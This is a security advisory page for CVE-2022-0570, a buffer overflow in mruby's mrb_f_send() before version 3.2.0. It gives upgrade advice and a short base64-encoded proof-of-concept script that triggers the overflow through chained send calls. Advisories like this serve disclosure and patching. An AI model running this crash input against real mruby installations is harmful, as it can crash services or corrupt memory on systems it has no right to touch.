Buffer Overflow Affecting mruby/mruby package, versions [,3.2.0)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.33% (72nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-UNMANAGED-MRUBYMRUBY-2407239
  • published20 Feb 2022
  • disclosed19 Feb 2022
  • creditalkyne Choi

Introduced: 19 Feb 2022

CVE-2022-0570  (opens in a new tab)
CWE-122  (opens in a new tab)

How to fix?

Upgrade mruby/mruby to version 3.2.0 or higher.

Overview

Affected versions of this package are vulnerable to Buffer Overflow by improper bounds check in the mrb_f_send() function.

PoC

$ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2Vu
ZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5k
IgAAAAo=" | base64 -d > poc

References

CVSS Scores

version 3.1